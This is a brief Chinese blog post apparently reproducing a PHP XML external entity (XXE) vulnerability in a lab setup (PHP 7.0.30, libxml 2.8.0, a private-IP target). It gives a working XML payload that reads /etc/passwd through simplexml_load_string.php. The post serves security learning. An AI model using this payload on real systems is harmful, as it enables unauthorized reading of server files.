PHP外部实体注入漏洞复现

0610

libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。

环境介绍

php7.0.30

libxml 2.8.0

图片[1]-PHP外部实体注入漏洞复现-吾爱博客

靶机ip:http://192.168.50.134:8080/

漏洞复现

WWW目录下有4个文件,dom.phpSimpleXMLElement.phpsimplexml_load_string.php均可触发XXE漏洞

图片[2]-PHP外部实体注入漏洞复现-吾爱博客
图片[3]-PHP外部实体注入漏洞复现-吾爱博客

Payload

POST /simplexml_load_string.php

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>
图片[4]-PHP外部实体注入漏洞复现-吾爱博客
© 版权声明
吾爱博客|AYFRE.COM 版权所有,转载请标明出处
THE END
网络安全
喜欢就支持以下吧
点赞0 分享
Monarchdos的头像-吾爱博客
搭建能够自动采集的漫画网站-吾爱博客
搭建能够自动采集的漫画网站
搭建能够自动采集的漫画网站
2019-6-23 1.3W+
Journal工作原理-吾爱博客
Journal工作原理
Journal工作原理
2019-5-17 1.1W+
SSH – Putty-吾爱博客
SSH – Putty
SSH – Putty
2021-3-31 1.1W+
手机QQ自定义设置5G在线状态-吾爱博客
手机QQ自定义设置5G在线状态
手机QQ自定义设置5G在线状态
2019-8-14 1W+
FAT表详解—图文详解——重要记录-吾爱博客
FAT表详解—图文详解——重要记录
FAT表详解—图文详解——重要记录
2018-4-7 9801
宝塔面板安装Nginx_Pagespeed给网站加速-吾爱博客
宝塔面板安装Nginx_Pagespeed给网站加速
宝塔面板安装Nginx_Pagespeed给网站加速
2019-8-15 6072
相关推荐
浅谈CSRF攻击方式-吾爱博客
浅谈CSRF攻击方式
浅谈CSRF攻击方式
2018-12-25 997
云影密码-吾爱博客
云影密码
云影密码
2022-8-15 170
Windows安全事件ID-吾爱博客
Windows安全事件ID
Windows安全事件ID
2022-5-17 156
Apache Log4j 远程代码执行漏洞复现-吾爱博客
Apache Log4j 远程代码执行漏洞复现
Apache Log4j 远程代码执行漏洞复现
2022-5-2 129
windows远程下载-吾爱博客
windows远程下载
windows远程下载
2022-5-9 98
网络安全词汇术语汇编-吾爱博客
网络安全词汇术语汇编
网络安全词汇术语汇编
2022-4-23 89
评论 抢沙发

请登录后发表评论

默认头像
nbta2016的头像-吾爱博客

nbta20162023-3-260

6666
w2844580041的头像-吾爱博客

w28445800412023-3-150

llllllkk
zhangsx1990的头像-吾爱博客

zhangsx19902023-3-150

感谢分享
🕊️的头像-吾爱博客

🕊️2023-3-130

试试接口连接;
养乐多的头像-吾爱博客

养乐多2023-3-120

在网页中点击后可以直接唤醒qq添加好友 如果设置了添加好友需要验证消息,则直接弹出发送验证消息界面 如果是无需验证直接添加,则访问api后直接添加好友 打包成了PHP接口,可以直接调用来添加好友
花生碎静候的头像-吾爱博客

花生碎静候2023-3-80

(⊙o⊙)…
Blauer Hund的头像-吾爱博客

Blauer Hund2023-3-60

我也看一下
张瑞鑫的头像-吾爱博客

张瑞鑫2023-2-230

多帅哦表情[se]-吾爱博客
标签云
鸡汤高考阅读采集邮件运算调试记录解析视频表白英语网络安全算法破解电影漫画源码活动油猴